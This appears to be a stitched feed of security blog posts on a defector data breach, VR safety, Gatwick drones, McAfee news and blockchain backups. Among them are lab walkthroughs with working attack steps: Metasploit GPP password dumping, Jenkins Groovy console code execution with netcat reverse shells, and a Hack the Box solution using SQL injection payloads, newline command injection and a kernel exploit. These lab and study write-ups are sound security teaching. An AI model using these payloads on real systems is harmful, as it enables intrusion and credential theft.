Hackers just caused grief for North Korean defectors. South Korea's Unification Ministry has revealed that attackers stole the personal data of 997 defectors, including their names and addresses. The breach came after a staff member at the Hana Foundation, which helps settle defectors from the North, unwittingly opened an email containing malware. The defectors' data is normally supposed to be isolated from the internet and encrypted, but the unnamed staffer didn't follow those rules, officials said.

Source: Wall Street Journal

Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality 

Virtual and Augmented reality technology is changing the way we see the world.

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies?

VR and AR technology sound a bit sci-fi and intimidating, right? They can be until you begin to understand the amazing ways these technologies are being applied to entertainment as well as other areas like education and healthcare. But, like any new technology, where there’s incredible opportunity there are also safety issues parents don’t want to ignore.

According to a report from Common Sense Media, 60 percent of parents are worried about VR’s health effects on children, while others say the technology will have significant educational benefits.

Virtual Reality

Adults and kids alike are using VR technology — headsets, software, and games — to experience the thrill of being in an immersive environment.

The Pokemon Go app uses AR technology to overlay characters on an existing environment.

According to Consumer Technology Association’s (CTA) 20th Annual Consumer Technology Ownership and Market Potential Study, there are now 7 million VR headsets in U.S. households, which equates to about six percent of homes. CTA estimates that 3.9 million VR/AR headsets shipped in 2017 and 4.9 million headsets will ship in 2018.

With VR technology, a user wears a VR Head Mounted Display (HMD) headset and interacts with 3D computer-generated environments on either a PC or smartphone, creating the feeling — or the illusion — that they are actually in that place. The headset has a display (typically OLED) for each eye, showing the environment at slightly different angles to give the perception of depth. VR environments are diverse. One might involve going inside the human body to learn about the digestive system, another might be a battlefield, while another might be a serene ocean view. The list of games, apps, experiences, and movies goes on and on.

Augmented Reality

AR differs from VR in that it overlays digital information onto physical surroundings and does not require a headset. AR is transparent, allowing you to see and interact with your environment while adding digital images and data to enhance your view of the real world. AR is used in apps like Pokémon Go and in GPS and walking apps that let you see your environment in real time. While not as immersive as VR, AR can still enrich a physical reality and is finding its way into a number of industries. VR and AR technologies are used in education for e-learning and in the military for combat, medic, and flight simulation training. The list of AR applications continues to grow.

To support these growing technologies, there are thousands of games, videos, and live music events available. VR museums and arcades exist, and theme parks are adapting thrill rides to meet the demand for VR experiences. Increasingly, retailers are hopping on board to use VR to engage customers, which will be a hot topic at the upcoming 2019 Consumer Electronics Show (CES) in Las Vegas.

Still, there are questions from parents, such as what effect these immersive technologies will have on children’s brains and whether VR environments blur the line between reality and fantasy enough to change a child’s behavior. The answer: at this point, not a lot is known about VR’s effect on children, but medical opinions are emerging warning of potential health impacts. So, calling a family huddle on the topic is a good idea if you have these technologies in your home or plan to in the near future.

VR/AR talking points for families

Apply safety features. VR apps and games include safety features such as restricted chat and privacy settings that allow users to filter out crude language and report abusive behavior. While some VR environments have moderators in place, some do not. This is also a great time to discuss password safety and privacy with your kids.

The best way to understand VR? Jump into the fun alongside your kids.

Age ratings and reviews. Some VR apps or games contain violence so pay attention to age restrictions. Also, be sure to read the reviews of the game to determine the safety, quality, and value of the VR/AR content.

Inappropriate content. While fun, harmless games and apps exist, so too does sexual content that kids can and do seek out. Be aware of how your child is using his or her VR headset and what content they are engaged with. Always monitor your child’s tech choices.

Isolation. A big concern with VR’s immersive structure is that players can and do become isolated in a VR world and, like with any fun technology, casual can turn addictive. Time limits on VR games and monitoring are recommended.

Physical safety/health. Because games are immersive, VR players can fall or hurt themselves or others while playing. To be safe, sit down while playing, don’t play in a crowded space, and remove pets from the playing area.

In addition to physical safety, doctors have expressed VR-related health concerns. Some warn about brain and eye development in kids related to VR technology. Because of the brain-eye connection of VR, players are warned about dizziness, nausea, and anxiety related to prolonged play in a VR environment.

Doctors recommend adult supervision at all times and keeping VR sessions short to give the eyes, brain, and emotions a rest. The younger the child, the shorter the exposure should be.

Be a good VR citizen. Being a good digital citizen extends to the VR world. When playing multi-player VR games, be respectful, kind, and remember there are real hearts behind those avatars. Also, be mindful of the image your own avatar is communicating. Be aware of bullies and bullying behavior in a virtual world where the lines between reality and fantasy can get blurred.

Get in the game. If you allow your kids to play VR games, get immersed in the game with them. Understand the environments, the community, the feeling of the game, and the safety risks first hand. A good rule: If you don’t want your child to experience something in the real world — violence, cursing, fear, anxiety — don’t let them experience it in a virtual world.

To get an insider’s view of what a VR environment is like and to learn more about potential security risks, check out McAfee’s podcast Hackable?, episode #18, Virtually Vulnerable.

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  appeared first on McAfee Blogs.

Penetration Testing on Group Policy Preferences

Hello Friends!! You might be aware of Group Policy Preferences in Windows Server 2008, which allows system administrators to set up specific configurations. It can be used to create a username and encrypted password on domain machines. But did you know that a normal user can elevate privileges to local administrator, and possibly compromise the security of the entire domain, because passwords in preference items are not secured?

Table of Content

  • What is Group Policy Preferences?
  • Why is using GPP to create a user account a bad idea?
  • Lab Set-Up Requirement
  • Create an Account in Domain Controller with GPP
  • Exploiting Group Policy Preferences via Metasploit -I
  • Exploiting Group Policy Preferences via Metasploit -II
  • Gpp-Decrypt
  • GP3finder
  • Powershell Empire

What is Group Policy Preferences?

Group Policy Preferences, commonly abbreviated GPP, permit administrators to configure and install Windows and application settings that were previously unavailable through Group Policy. One of the most useful features of GPP is the ability to store credentials in policies; moreover, these policies can make all kinds of configuration changes to machines, such as:

  • Map drives
  • Create Local Users
  • Data Sources
  • Printer configuration
  • Registry Settings
  • Create/Update Services
  • Scheduled Tasks
  • Change local Administrator passwords

Why is using GPP to create a user account a bad idea?

If you use Microsoft GPP to create a local administrator account, consider the security consequences carefully: the password is stored in SYSVOL in the preference item. SYSVOL is the domain-wide shared folder in Active Directory, accessible to all authenticated users.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP preference is created for a user or group account, an associated Groups.xml file is created in SYSVOL with the relevant configuration information, and the password in it is AES-256 encrypted. However, since Microsoft published the AES key and all authenticated users have read access to SYSVOL, the password is effectively not secure.

In this article, we will perform Active Directory penetration testing through Group Policy Preferences and try to steal the stored password from inside SYSVOL in multiple ways.

Let’s Start!!

Lab Set-Up Requirement

  • Microsoft Windows Server 2008 R2
  • Microsoft Windows 7/10
  • Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to: Computer Configuration > Control Panel Settings > Local Users and Groups.

Right-click on the “Local Users and Groups” option and select New > Local User.

You will then get the New Local User properties window, where you can create a new user account.

As you can observe from the image below, we have created an account for the user “raaz”.

Don’t forget to update group policy configuration.

As discussed above, whenever a new GPP preference is created for a user or group account, it is associated with a Groups.xml file stored inside SYSVOL.

From the image below, you can see the full path that leads to the Groups.xml file. As you can see, this XML file holds the cpassword value for the user raaz inside its Properties tag, readable by any authenticated user.
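For reference, a Groups.xml preference item looks roughly like the fragment below. This is a hand-written illustration rather than the lab's actual file: the clsid GUIDs, timestamp and uid are placeholders, and the cpassword value shown is the encrypted string decrypted later in this post:

```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
        name="raaz" image="0" changed="2018-12-01 12:00:00" uid="{...}">
    <Properties action="C" newName="" fullName="" description=""
                cpassword="qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80"
                changeLogon="0" noChange="0" neverExpires="0"
                acctDisabled="0" userName="raaz"/>
  </User>
</Groups>
```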

Exploiting Group Policy Preferences via Metasploit -I

As we know, any authenticated user can access SYSVOL. Suppose I know a client machine credential, say raj:Ignite@123; with its help I can exploit Group Policy Preferences to retrieve the XML file. The following Metasploit auxiliary module lets you enumerate these files from target domain controllers by connecting to SMB as that user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft’s public AES key. This module has been tested successfully on a Windows 2008 R2 domain controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

As you can observe, it has dumped the password abcd@123 from inside the Groups.xml file for the user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provides a post-exploitation module for enumerating the cpassword, but for this you need to have compromised the target machine at least once; then you will be able to run the post module below.

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

From the image below, you can observe that it found the cpassword twice, in two different locations:

  • C:\ProgramData\Microsoft\Group Policy\History\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
  • C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml


Another method is to connect to the target machine via SMB and try to access SYSVOL with the help of smbclient. Execute its command to access the shared directory via an authorized account, and then move to the following path to get the Groups.xml file: SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient // -U raj

As you can observe, we have successfully transferred Groups.xml to our local machine. As this file holds the encrypted cpassword, we now need to decrypt it.

Gpp-Decrypt

For decryption we use gpp-decrypt, a simple Ruby script included in Kali Linux which decrypts a given GPP-encrypted string.

Once you have access to the Groups.xml file, you can decrypt the cpassword using the following syntax:

gpp-decrypt <encrypted cpassword>
gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps the password in plaintext, as shown below.
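As a quick stdlib-only sanity check, the blob's size is consistent with that result: GPP strips the trailing base64 padding, and the restored ciphertext is exactly two AES blocks, which matches an eight-character password in UTF-16-LE plus one full block of PKCS#7 padding (the AES decryption itself is left to gpp-decrypt):

```python
import base64

cpassword = "qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80"
# GPP drops the '=' padding from the base64 string; restore it first.
ciphertext = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
print(len(ciphertext))                      # 32 bytes: two 16-byte AES blocks
print(len("abcd@123".encode("utf-16-le")))  # 16 bytes, + 16 bytes padding = 32
```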


GP3finder

GP3finder is another script, written in Python, for decrypting the cpassword; you can download this tool from here.

Once you have access to the Groups.xml file, you can decrypt the cpassword using the following syntax:

gp3finder.exe -D <encrypted cpassword>
gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps the password in plaintext, as shown below.

PowerShell Empire

PowerShell Empire is another framework, just like Metasploit, for which you first need access to a low-privilege shell. Once you have exploited the target machine, use the privesc/gpp module to extract the password from inside the Groups.xml file.

This module retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

usemodule privesc/gpp

As a result, it dumps the password in plaintext, as shown below.

Author: Aarti Singh is a researcher and technical writer at Hacking Articles, an information security consultant, social media lover and gadget enthusiast. Contact here

The post Penetration Testing on Group Policy Preferences appeared first on Hacking Articles.

Hackers defeat vein authentication by making a fake hand

Biometric security has moved beyond just fingerprints and face recognition to vein-based authentication. Unfortunately, hackers have already figured out a way to crack that, too. According to Motherboard, security researchers at the Chaos Communication Congress hacking conference in Leipzig, Germany, showed how they used a wax model hand to defeat a vein authentication system.

Source: Motherboard

NBlog Dec 29 – awareness case study

The drone incident at Gatwick airport makes a good backdrop for a security awareness case study discussion around resilience.  

It's a big story globally, all over the news, hence most participants will have heard something about it. Even if a few haven't, the situation is simple enough for them to pick up on and engage in the conversation.

The awareness objective is for participants to draw out, consider, discuss and learn about the information risk, information or cybersecurity aspects, in particular the resilience angle ... but actually, that's just part of it. It would be better if participants were able to generalize from the Gatwick drone incident, seeing parallels in their own lives (at work and at home) and ultimately respond appropriately. The response we're after involves workers changing their attitudes, decisions and behaviors e.g.:
  • Considering society's dependence on various activities, services, facilities, technologies etc., as well as the organization and their own dependencies, and ideally reducing dependence on vulnerable aspects;
  • Becoming more resilient i.e. stronger, more willing and able to cope with incidents and challenges of all kinds;
  • Identifying and reacting appropriately to various circumstances that are short on resilience e.g. avoiding placing undue reliance on relatively fragile or unreliable systems, comms, processes and relationships;
  • Perhaps even actively exploiting situations, gaining business advantage by persuading competitors or adversaries to rely unduly on their resilience arrangements (!).
Assorted journalists, authorities and bloggers are keen to point out that the Gatwick drone incident is 'a wake-up call' and that 'something must be done'. Most imply that they are concerned about other airports and, fair enough, the lessons are crystal clear in that context ... but we have deliberately expanded across other areas where resilience is just as important, along with risk, security, safety, reliability, technology and more.

That's a lot of awareness mileage from a public news story but, as with the awareness challenge, putting the concept into practice is where we earn our trivial fees!

Visit the website or contact me to find out more about the NoticeBored service, and to quote you a trivial price - so low in fact that avoiding a single relatively minor incident should more than justify the annual running costs of your entire security awareness and training program. 

By the way, we set our sights much higher than that!

McAfee 2018: Year in Review

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION®  Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

Exploiting Jenkins Groovy Script Console in Multiple Ways

Hello Friends!! There are many ways to exploit Jenkins; however, we were interested in the Script Console, because Jenkins has a lovely Groovy script console that permits anyone to run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Content

  • Jenkin’s Groovy Script Console
  • Metasploit
  • groovy
  • Groovy executing shell commands -I
  • Groovy executing shell commands -II

Jenkin’s Groovy Script Console

Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do including:

  • Create sub-processes and execute arbitrary commands on the Jenkins master and agents.
  • Read files to which the Jenkins master has access on the host (like /etc/passwd).
  • Decrypt credentials configured within Jenkins.
  • Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins.

Source :


Metasploit

This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.

use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit

Metasploit uses a command stager to exploit the command injection.

Hence, you can observe that it has given a Meterpreter session on the victim’s machine.


Suppose you find a Jenkins instance without a login password, or you are a normal user who has permission to access the Script Console; then you can exploit this privilege to get a reverse shell on the machine. From the Jenkins dashboard, go to Manage Jenkins and then select Script Console.

In the script console you have full privileges to run any program code, so I executed a reverse-shell script taken from GitHub to get a reverse connection back to a netcat listener on my local machine:

nc -lvp 1234

Once the script is executed, it will give a netcat session on the victim’s machine.

Groovy executing shell commands -I

Similarly, with the help of the following piece of code, which I found here, I tried to achieve RCE, executing OS commands through the Groovy script console.

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"


Groovy executing shell commands -II

Similarly, I found another very small piece of code here to exploit the Groovy console, which will achieve RCE and execute a shell command.

def cmd = "cmd.exe /c dir".execute();

Author: Aarti Singh is a researcher and technical writer at Hacking Articles, an information security consultant, social media lover and gadget enthusiast. Contact here

The post Exploiting Jenkins Groovy Script Console in Multiple Ways appeared first on Hacking Articles.

CVE-2018-1000887 (peel_shopping)

Peel Shopping peel-shopping_9_1_0 contains a cross-site scripting (XSS) vulnerability that can result in an authenticated user injecting JavaScript code into the “Site Name EN” parameter. This attack appears to be exploitable if the malicious user has access to the administration account.

2018: The year of the data breach tsunami

It’s tough to remember all of the data breaches that happened in 2018. But when you look at the largest and most impactful ones that were reported throughout the year, it paints a grim picture about the state of data security today.

The consequences of major companies leaking sensitive data are many. For consumers, it represents a loss of privacy, potential identity theft, and countless hours repairing the damage to devices. And it’s costly for companies, too, in the form of bad press and the resulting damage to their reputation, as well as time and money spent to remediate the breach and ensure customers’ data is well secured in the future.

But despite the well-known costs of data breaches, the problem of leaky data isn’t getting better. While there were a greater number of breaches in 2017, 2018 saw breaches on a more massive scale and from marquee players, such as Facebook, Under Armor, Quora, and Panera Bread. Cybercriminals stole sensitive personally identifiable information (PII) from users, including email and physical addresses, passwords, credit card numbers, phone numbers, travel itineraries, passport data, and more.

You’d think these problems would cause companies to be extra diligent about discovering data breaches, but that doesn’t seem to be the case. In reality, companies rarely discover data breaches themselves. According to Risk Based Security, only 13 percent of data breaches are discovered internally.

To help people better understand the modern problem of data breaches, TruthFinder created this infographic. It clarifies the extent of the crisis using statistics from the Identity Theft Resource Center and Experian. Take a look at the infographic below to get a sense of why 2018 was the year of the data breach tsunami.

data breach

The post 2018: The year of the data breach tsunami appeared first on Malwarebytes Labs.

Hack the Box: Nightmare Walkthrough

Today we are going to solve another CTF challenge, “Nightmare”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Nightmare is

Penetrating Methodology

  • Network scanning (Nmap)
  • Browsing IP address through HTTP
  • Checking for SQL injection vulnerability
  • Exploiting Second Order Injection
  • Login through SSH
  • Login through SFTP
  • Exploiting SFTP to gain reverse shell
  • Discovering files with SGID bit set
  • Privilege escalation using “sls”
  • Finding exploit for kernel
  • Making changes to the exploit
  • Getting root privilege using exploit
  • Getting root flag


Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sC -sV

The Nmap output shows us that there are two ports open: 80 (HTTP) and 2222 (SSH).

We find that port 80 is running http, so we open the IP in our browser.

When we visit the webpage, we find a login page. After trying a few SQL injection payloads, we find that this page is vulnerable to “second order SQL injection”. This means that to exploit the vulnerability we have to register a user whose username contains our SQL injection query and then log in with that same username.
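The mechanics can be sketched with a tiny self-contained example. Here Python's built-in sqlite3 stands in for the site's MySQL backend (so the comment marker is -- rather than #), and the notes table and its columns are invented for illustration:

```python
import sqlite3

con = sqlite3.connect(":memory:")
cur = con.cursor()
cur.execute("CREATE TABLE users (username TEXT, password TEXT)")
cur.execute("CREATE TABLE notes (id INTEGER, body TEXT, owner TEXT)")
cur.execute("INSERT INTO notes VALUES (1, 'private note', 'someone')")

# Step 1: registration is parameterized, so the payload is stored inertly.
payload = "admin') UNION SELECT 1, sqlite_version()--"
cur.execute("INSERT INTO users VALUES (?, ?)", (payload, "pass"))

# Step 2: a later feature trusts the *stored* username and concatenates it
# into a query; this is where the injection actually fires.
stored = cur.execute("SELECT username FROM users").fetchone()[0]
query = "SELECT id, body FROM notes WHERE (owner = '%s')" % stored
rows = cur.execute(query).fetchall()
print(rows)  # the UNION row leaks data unrelated to this user's notes
```

The payload does nothing at registration time and only fires when the application later rebuilds a query from the stored value, which is exactly what makes second-order injection easy to miss.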

First we register a user with the credentials “admin'):pass” using the register link on the login page. Now when we log in with this user, we get an SQL error on the web page.

Having found that the web application is vulnerable to second order SQL injection, we now determine the number of columns. We register a user with the following credentials:

Username: admin') order by 3#
Password: pass

We keep the same password for every user we register.

Now when we log in, we get an SQL error, which means the table has fewer than three columns. So we register another user using the following query:

admin') order by 2#

When we log in this time, we do not get an SQL error, which means the table has 2 columns.

Next we find the version of the SQL database the site is running. To find the version of the database, we register with the following query:

admin') union select 1, @@version#

After finding the version, we know that it is a MySQL database. Next we find the name of the database by registering with the following query:

admin') union select 1, database()#

We find that the current database is called “notes”, but we want the names of all the databases on the server. So we register a user using the following query:

admin') union select 1, group_concat(distinct table_schema) from information_schema.tables#

We get another database called “sysadmin”; we now find the table names inside “sysadmin” by registering a user with the following query:

admin') union select 1, group_concat(distinct table_name) from information_schema.columns where table_schema="sysadmin"#

We find two tables called “users” and “configs”; we now find the column names inside the “users” table. To find the column names we register a user with the following query:

admin') union select 1, group_concat(distinct column_name) from information_schema.columns where table_schema="sysadmin" and table_name="users"#

We find two columns called “username” and “password”. To dump the data inside these columns, we register a user with the following query:

admin') union select 1, group_concat(username, 0x7c, password, 0x0a) from sysadmin.users#

This gives us several username/password pairs; we try to log in through SSH using these credentials and find that “ftpuser:@whereyougo?” works. We are unable to get a shell using SSH, so we instead connect using SFTP and successfully log in.

ssh -p 2222 ftpuser@
sftp -p 2222 ftpuser@

As we are not able to get a shell using SSH, we search for an SFTP exploit and find one. You can download the exploit from here.

We made changes to the exploit so that we can get a reverse shell.

After making changes to the exploit, we setup our listener using netcat and then run the script.


On our listener we get a reverse shell.

nc -lvp 443

After getting the reverse shell, we spawn a TTY shell. Inside the /home/decoder/ directory we find a directory called “test” and a file called “user.txt”. As they belong to the “decoder” group, we search for files that belong to the “decoder” group.

python -c 'import pty; pty.spawn("/bin/bash")'
find / -group "decoder" 2>/dev/null

Running the sls command, we find that it is a binary that runs the ls command. It also has the SGID bit set, so we can abuse this to escalate our privileges.

We use the strings command to inspect the binary and find that it uses the system() function to execute the ls command.

strings /usr/bin/sls

As the ls command is executed inside a system() call, we can use the -b argument to inject and execute our own command.

sls -b '
bash -p'
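To see why the embedded newline works, here is a small Python simulation of the flaw. This is a hypothetical stand-in for the sls binary, not its actual code, and a harmless echo replaces bash -p:

```python
import subprocess

# Imagine a binary that builds its shell command by pasting its argument
# onto "ls " and handing the result to system(). A newline inside the
# argument terminates the ls command, so the remainder of the argument
# runs as a second shell command.
user_arg = "\necho INJECTED"
result = subprocess.run("ls " + user_arg, shell=True,
                        capture_output=True, text=True)
print(result.stdout)  # directory listing, then the word INJECTED
```

With sls the injected second command is `bash -p`, which keeps the SGID group privileges instead of printing a marker string.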

After getting a shell, we run the id command and find that we have spawned a shell as the user “decoder”. We can now open the “user.txt” file and find the first flag.

Enumerating the system, we check the kernel version to see if there is any exploit available for privilege escalation.

uname -a

We find that this version of the kernel is vulnerable to the exploit here.

We download the code on our machine and compile it using gcc. Then we start python http server and send the compiled exploit file to the target machine. When we run the exploit we are unable to get a privileged shell as it shows an error saying that the kernel version is not recognized.

In kali machine:

gcc -o priv 43418.c
python -m SimpleHTTPServer 80

On target machine:

chmod +x priv

Now we have to make a few changes for the exploit to work, so we open the C file again and make the changes.

Now we again compile and send the file to the target machine. This time when we run the file we get an error saying permission denied on set_groups.

So we exit the shell and run the exploit as ftpuser. As soon as we run it, we get a root shell.

We go to /root directory and find a file called “root.txt”. When we open the file we get the final flag.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Hack the Box: Nightmare Walkthrough appeared first on Hacking Articles.

Weekly Update 119

Presently sponsored by: Live Workshop! Watch the Varonis DFIR team investigate a cyberattack using our data-centric security stack


I'm home! And it's a nice hot Christmas! And I've got a new car! And that's where the discussion kinda started heading south this week. As I say in the video, the reaction to my tweet about it was actually overwhelmingly positive, but there was this unhealthy undercurrent of negativity which was really disappointing to see. Several other non-related events following that demonstrated similar online aggressiveness and I don't know if it was a case of too much eggnog or simply people having more downtime to be dicks online, but it was a really odd spate of bad behaviour.

Be that as it may, I hope there's some useful content in this one but I do appreciate the car bit in particular may not be relevant to a lot of people. In case you want to skip it, that bit starts at about the 3-minute mark and goes until the 28-minute mark. For those that do watch it, I hope you enjoy something a little bit different this week whether you agree with my choice or not 🙂



  1. It's a new car! (that's the tweet with the pics and all the likes, but if you dig far enough, you'll see a negative undercurrent too)
  2. The Tesla is a great car, but it's not for everyone (some people just look for different things in a car, and that's absolutely fine)
  3. Scott Helme got himself blocked while trying to understand the barriers to HTTPS adoption (if it wasn't for the fact this is becoming an alarming trend amongst those pushing back against secure connections, it would be unremarkable)
  4. I got myself chastised for saying this is an alarming trend! (seriously people, the issue here is people ignorantly blocking people like Scott, not people saying that being ignorant is ignorant!)
  5. Scott wrote a good piece on how to actually implement HTTPS and remain compatible with non-supporting clients (this is where we should be - talking about technical solutions - leave the emotional baggage at home)
  6. The HTTPS discussion is reminiscent of Scott's anti-vaxxers post (discard the science, block out the expert voices)
  7. I've got a post I'm working on about fundamental financial lessons for tech people (there's a heap of support in that tweet and I'm really excited about publishing it on Monday!)
  8. Tech Fabric are sponsoring my blog this week (a big thanks to those guys for supporting me over the course of 2018, check them out for scalable, reliable and secure cloud native apps)

NBlog Dec 28 – US Dept of Commerce shutdown

Earlier this year I heard about the threatened shutdown of WWV and WWVH, NIST's standard time and frequency services, due to the withdrawal of government funding - an outrageous proposal for those of us around the world who use NIST's scientific services routinely to calibrate our clocks and radios.

Today while hunting for a NIST security standard that appears to no longer be online, I was shocked to learn that it's not just WWV that is closing down: it turns out all of NIST is under threat, in fact the entire US Department of Commerce.

Naturally, being a large bureaucratic government organization, there is a detailed plan for the shutdown with details of certain 'exempt' government services that must be maintained according to US law although how those services and people are to be paid is unclear to me. After the funding ceases, DoC employees are required (or is that requested?) to turn up for work for a few more hours to set their out-of-office notifications (on the IT systems that are presumably about to be turned off?), then piss off basically.  

To me, that's an almost unbelievably callous way to treat public servants. 

So is this fake news? Is it "just politics", brinkmanship by Mr Trump's administration I wonder? 

The root cause, I presume, is the usual disparity between the government's income and expenses, fueled by battles between the political parties plus their 'lobbyists' and the extraordinarily xenophobic pressure to spend spend spend on 'defense'. I gather the US-Mexico border wall is, after all (surprise surprise), to be funded by the US, so that's yet another splash of red ink across the government's books.

Using the blockchain to create secure backups

“Oh no! I’ve got a ransomware notice on my workstation. How did this happen?”

“Let’s figure that out later. First, apply the backup from a few minutes ago, so we can continue to work.”

Now that wasn’t so painful, was it? Having a rollback solution or a recent backup could make this ideal post ransomware–infection scenario possible. But which technology could make this work? And is it possible today?

As we have pointed out before, blockchain technology is not for cryptocurrencies alone. In fact, a few vendors are already offering to use the blockchain to create recent, secured backups.


With ransomware still one of the most prevalent threats, having backups is one of the most advised strategies against having to pay a ransom. Paying ransoms not only fuels the ransomware industry, it is likely to become illegal in some states and countries.

For backups to be as effective as possible:

  • They need to be recent.
  • They shouldn’t be destroyed in the same accident or incident as the originals.
  • They should be secure against tampering and theft.
  • They should be easy to deploy.

To achieve these goals, creating backups in several locations, on different media, and encrypted if necessary goes a long way. This is exactly why using blockchain technology makes sense.


A quick reminder about how blockchain works. Blockchain is a decentralized system that can keep track of changes in the form of a distributed database that keeps a continuously growing list of transactions. Every change in the block results in a different hash value. This provides the opportunity to add a digital signature to each set of data. So, ideally you can be sure that the backup you are about to deploy is recent and hasn’t been tampered with by unauthorized hands.

How it should work

Blockchain technology is a decentralized ledger. Each node keeps an identical copy of the ledger, and the authenticity of those copies can be confirmed by any of the nodes. The nodes are the “workers” that calculate a valid hash for the next block in the blockchain.

This means that if the first block held an encrypted copy of all the files you use today, each subsequent block would include that set plus all the changes made before the next hash was accepted by the network of nodes. In other words, each new block would hold all the information in the previous one plus all the changes since then.
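The chaining described above can be sketched in a few lines of Python. This is a simplified illustration, not a real blockchain: the block layout, function names, and sample changes are all hypothetical, and real networks add proof-of-work, signatures, and consensus on top of this linking.

```python
import hashlib
import json

def block_hash(block: dict) -> str:
    # Hash the block's canonical JSON form (a hypothetical layout).
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

def make_block(prev_hash: str, changes: list) -> dict:
    # Each block records the previous block's hash plus new changes.
    return {"prev_hash": prev_hash, "changes": changes}

def verify_chain(chain: list) -> bool:
    # Each block must reference the hash of the block before it.
    for prev, curr in zip(chain, chain[1:]):
        if curr["prev_hash"] != block_hash(prev):
            return False
    return True

genesis = make_block("0" * 64, ["full snapshot of all files"])
b1 = make_block(block_hash(genesis), ["report.docx modified"])
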